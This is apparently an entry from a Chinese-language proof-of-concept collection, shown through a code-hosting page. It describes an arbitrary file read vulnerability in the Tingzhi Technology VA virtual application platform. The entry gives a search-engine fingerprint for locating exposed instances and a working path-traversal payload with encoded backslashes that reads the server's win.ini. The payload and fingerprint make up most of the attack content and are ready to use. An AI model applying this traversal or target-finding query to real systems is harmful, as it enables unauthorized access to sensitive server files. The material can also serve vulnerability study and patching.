Awesome-POC/Web应用漏洞/霆智科技 VA虚拟应用平台 任意文件读取漏洞.md

29 lines
568 B
Markdown
Raw Normal View History

2023-07-05 09:20:42 +08:00
# 霆智科技 VA虚拟应用平台 任意文件读取漏洞
## 漏洞描述
霆智科技 VA虚拟应用平台 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感信息
## 漏洞影响
霆智科技 VA虚拟应用平台
2023-08-28 15:55:36 +08:00
## 网络测绘
2023-07-05 09:20:42 +08:00
```
body="EAA益和应用接入系统"
```
## 漏洞复现
登陆页面
2023-07-11 10:57:15 +08:00
![image-20230704111747376](./images/image-20230704111747376.png)
2023-07-05 09:20:42 +08:00
验证POC
```
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
```
2023-07-11 10:57:15 +08:00
![image-20230704112349037](./images/image-20230704112349037.png)